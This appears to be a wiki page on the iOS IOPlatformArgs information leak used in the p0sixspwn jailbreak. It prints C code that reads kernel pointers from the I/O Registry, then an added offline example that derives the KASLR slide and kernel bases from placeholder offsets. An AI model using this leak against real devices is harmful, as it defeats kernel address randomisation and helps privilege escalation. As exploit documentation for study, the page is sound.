IOPlatformArgs leak

From The Apple Wiki

The IOPlatformArgs vulnerability is an information leak: the IOPlatformArgs property of the IOPlatformExpertDevice entry in the I/O Registry could be read by an unprivileged process and contained kernel virtual addresses (the device tree and the boot_args structure), from which the kernel base address can be computed. Used in p0sixspwn.

#include <CoreFoundation/CoreFoundation.h>
#include <IOKit/IOKitLib.h>
#include <stdlib.h>
#include <strings.h>

/* Function name is missing on this page; the name below is chosen here. */
static uint32_t
leak_boot_args_address(void)
{
  CFStringRef parameter = CFSTR("IOPlatformArgs");
  CFDataRef data = NULL;
  io_service_t platformExpert = IOServiceGetMatchingService(kIOMasterPortDefault,
                                                            IOServiceMatching("IOPlatformExpertDevice"));
  if (platformExpert) {
    /* The bug: this property, holding kernel pointers, is readable from userland. */
    data = IORegistryEntryCreateCFProperty(platformExpert, parameter,
                                           kCFAllocatorDefault, 0);
    IOObjectRelease(platformExpert);
  }
  if (!data)
    return 0;   /* service not found, or the property is gone (patched kernel) */
  typedef struct {
    uint32_t deviceTreeP;   /* kernel virtual address of the device tree */
    uint32_t bootArgs;      /* kernel virtual address of the boot_args structure */
    uint32_t zero;
    uint32_t zero_1;
  } platformArgs;
  CFIndex bufferLength = CFDataGetLength(data);
  if (bufferLength < (CFIndex)sizeof(platformArgs)) {
    CFRelease(data);
    return 0;   /* unexpected layout */
  }
  UInt8 *buffer = malloc(bufferLength);
  CFDataGetBytes(data, CFRangeMake(0, bufferLength), buffer);
  CFRelease(data);
  platformArgs IOPlatformArgs;
  bcopy(buffer, &IOPlatformArgs, sizeof(IOPlatformArgs));
  free(buffer);
  return IOPlatformArgs.bootArgs;
}

The returned value is the kernel virtual address of the boot_args structure. For a given firmware build that structure sits at a known distance from the kernel image, so subtracting the unslid address gives the KASLR slide and therefore the kernel's virtual base. Once the attacker knows the virtual base, they can use the virt_to_phys macro to see what the physical base is; this way both bases are leaked. All of this relies on the IOPlatformArgs bug, i.e. on the property being readable from userland.
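The following is an added example of the second half of the technique (property bytes in, kernel slide and both bases out); it is not code from this page or from p0sixspwn. Everything in it runs offline: the 16-byte property is constructed by hand, and the unslid kernel_base, boot_args, gVirtBase and gPhysBase values are placeholders for one hypothetical 32-bit firmware build, not offsets from any real kernelcache. It also assumes that the kernel's linear map moves with the kernel, so that the slide applies to both gVirtBase and gPhysBase when virt_to_phys is evaluated on the slid virtual base.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Layout of the 16-byte IOPlatformArgs property, as described on this page. */
typedef struct {
    uint32_t deviceTreeP;   /* kernel VA of the device tree */
    uint32_t bootArgs;      /* kernel VA of the boot_args structure */
    uint32_t zero;
    uint32_t zero_1;
} platformArgs;

/* Unslid addresses for ONE firmware build. Assumed placeholder values, not
 * taken from a real kernelcache; a real exploit carries a table of these. */
typedef struct {
    uint32_t kernel_base;   /* unslid VA of the kernel image */
    uint32_t boot_args;     /* unslid VA of boot_args */
    uint32_t virt_base;     /* unslid gVirtBase: start of the kernel's linear map */
    uint32_t phys_base;     /* unslid gPhysBase: physical address it maps */
} firmware_layout;

static const firmware_layout example_layout = {
    .kernel_base = 0x80001000u,
    .boot_args   = 0x802e8000u,
    .virt_base   = 0x80000000u,
    .phys_base   = 0x40000000u,
};

typedef struct {
    uint32_t slide;
    uint32_t kernel_virt_base;
    uint32_t kernel_phys_base;
} kernel_bases;

/* Parse the raw property bytes. Assumes a little-endian host, like the ARM
 * device the property came from. Rejects a wrong-size blob and one whose two
 * trailing words are non-zero, since then the layout is not the expected one. */
bool parse_platform_args(const uint8_t *buf, size_t len, platformArgs *out)
{
    if (buf == NULL || out == NULL || len != sizeof(*out))
        return false;
    memcpy(out, buf, sizeof(*out));
    return out->zero == 0 && out->zero_1 == 0;
}

/* virt_to_phys for a linearly mapped kernel: phys = virt - gVirtBase + gPhysBase.
 * Both bases are passed in already slid. */
uint32_t virt_to_phys(uint32_t virt, uint32_t virt_base, uint32_t phys_base)
{
    return virt - virt_base + phys_base;
}

/* Leaked boot_args pointer -> KASLR slide -> both kernel bases. The slide is the
 * difference between the leaked (slid) pointer and its unslid address. A pointer
 * below the unslid address, or a slide that is not page aligned, means the
 * layout table does not match this build, so refuse rather than guess. */
bool derive_kernel_bases(uint32_t leaked_boot_args, const firmware_layout *fw,
                         kernel_bases *out)
{
    if (fw == NULL || out == NULL || leaked_boot_args < fw->boot_args)
        return false;
    uint32_t slide = leaked_boot_args - fw->boot_args;
    if (slide & 0xfffu)
        return false;
    out->slide = slide;
    out->kernel_virt_base = fw->kernel_base + slide;
    /* Assumption: the linear map moves with the kernel, so both bases are slid. */
    out->kernel_phys_base = virt_to_phys(out->kernel_virt_base,
                                         fw->virt_base + slide,
                                         fw->phys_base + slide);
    return true;
}

/* Constructed sample of what IORegistryEntryCreateCFProperty would return on a
 * device whose kernel was slid by 0x400000. Not captured from real hardware. */
static const uint8_t sample_property[16] = {
    0x00, 0x00, 0x6f, 0x80,   /* deviceTreeP = 0x806f0000 */
    0x00, 0x80, 0x6e, 0x80,   /* bootArgs    = 0x806e8000 */
    0x00, 0x00, 0x00, 0x00,   /* zero */
    0x00, 0x00, 0x00, 0x00,   /* zero_1 */
};

/* End to end: property bytes in, kernel bases out. */
bool leak_to_bases(const uint8_t *buf, size_t len, kernel_bases *out)
{
    platformArgs args;
    if (!parse_platform_args(buf, len, &args))
        return false;
    return derive_kernel_bases(args.bootArgs, &example_layout, out);
}

int main(void)
{
    kernel_bases kb;
    if (!leak_to_bases(sample_property, sizeof(sample_property), &kb))
        return 1;
    printf("slide 0x%08x virt base 0x%08x phys base 0x%08x\n",
           kb.slide, kb.kernel_virt_base, kb.kernel_phys_base);
    return 0;
}
```

On the sample blob this yields slide 0x400000, virtual base 0x80401000 and physical base 0x40401000. The two rejections in derive_kernel_bases are the check a practitioner wants before using a leaked pointer: on a build whose offsets are not in the table, the "slide" is garbage and must not be fed into a kernel write.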